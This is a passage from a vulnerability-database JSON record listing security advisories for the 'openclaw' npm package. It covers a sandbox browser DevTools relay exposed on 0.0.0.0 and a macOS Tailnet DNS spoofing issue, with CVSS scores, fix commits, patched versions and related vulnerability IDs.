later.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/3e730c0332eb0a3dc9e1e8c29a5f95e933317b41","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/3e730c0332eb0a3dc9e1e8c29a5f95e933317b41"},{"reference_url":"https://github.com/openclaw/openclaw/pull/44088","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/44088"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.12","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":
"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.12"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-m69h-jm2f-2pv8","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-m69h-jm2f-2pv8"},{"reference_url":"https://github.com/advisories/GHSA-m69h-jm2f-2pv8","reference_id":"GHSA-m69h-jm2f-2pv8","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-m69h-jm2f-2pv8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112780?format=json","purl":"pkg:npm/openclaw@2026.3.12","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"V
CID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"V
CID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"V
CID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"V
CID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"V
CID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"V
CID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.12"}],"aliases":["GHSA-m69h-jm2f-2pv8"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ftdn-9fum-cbe4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89523?format=json","vulnerability_id":"VCID-fuda-zxu8-gbb4","summary":"OpenClaw: Sandbox browser CDP relay could expose DevTools protocol on 0.0.0.0\n## Summary\n\nSandbox browser CDP relay could expose DevTools protocol on 0.0.0.0.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nThe sandbox browser CDP relay could bind too broadly, exposing Chrome DevTools Protocol access outside the intended local/sandbox source range.\n\n## Technical Details\n\nThe fix enforces CDP source-range restriction by default and avoids broad `0.0.0.0` exposure unless explicitly configured.\n\n## Fix\n\nThe issue was fixed in #61404. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `fbf11ebdb7110632f93926d0ac7b48f04cb44d77`\n- PR: #61404\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. 
The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/fbf11ebdb7110632f93926d0ac7b48f04cb44d77","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/fbf11ebdb7110632f93926d0ac7b48f04cb44d77"},{"reference_url":"https://github.com/openclaw/openclaw/pull/61404","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/61404"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-525j-hqq2-66r4","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-525j-hqq2-66r4"},{"reference_url":"https://github.com/advisories/GHSA-525j-hqq2-66r4","reference_id":"GHSA-525j-hqq2-66r4","reference_type":"","scor
es":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-525j-hqq2-66r4"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109896?format=json","purl":"pkg:npm/openclaw@2026.4.10","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6cfj-zugb-7uhq"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hphn-8fnj-qkh2"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-q3a2-qk5j-1yat"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"re
source_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10"}],"aliases":["GHSA-525j-hqq2-66r4"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-fuda-zxu8-gbb4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89900?format=json","vulnerability_id":"VCID-g3hg-peh1-tudm","summary":"OpenClaw: macOS Tailnet DNS Spoofing & Credential Exfiltration\n## Summary\nmacOS Wide-Area Discovery Accepts Arbitrary Tailnet Peer as DNS Authority and Exfiltrates Operator Credentials\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: Real shipped macOS discovery steering bug, but exploitation needs same-tailnet position, a CA-trusted endpoint, and user selection, so medium not high.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `a23c33a681f8c1b22dc793995acc4c5c4b568346` — 2026-03-31T10:04:11+01:00\n\nOpenClaw thanks @nexrin for 
reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41393","reference_id":"","reference_type":"","scores":[{"value":"7e-05","scoring_system":"epss","scoring_elements":"0.0069","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41393"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/a23c33a681f8c1b22dc793995acc4c5c4b568346","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T12:50:17Z/"}],"url":"https://github.com/openclaw/openclaw/commit/a23c33a681f8c1b22dc793995acc4c5c4b568346"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-q9w8-cf67-r238","reference_id":"","reference
_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T12:50:17Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-q9w8-cf67-r238"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41393","reference_id":"CVE-2026-41393","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41393"},{"reference_url":"https://github.com/advisories/GHSA-q9w8-cf67-r238","reference_id":"GHSA-q9w8-cf67-r238","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-q9w8-cf67-r238"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-dns-authority-acceptance-and-credential-exfiltration-via-wide-area-discovery","reference_id":"openclaw-arbitrary-dns-authority-acceptance-and-credential-exfiltration-via-wide-area-discovery","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T12:50:17Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-dns-authority-acceptance-and-credential-exfiltration-via-wide-area-discovery"}],"fixed_packages
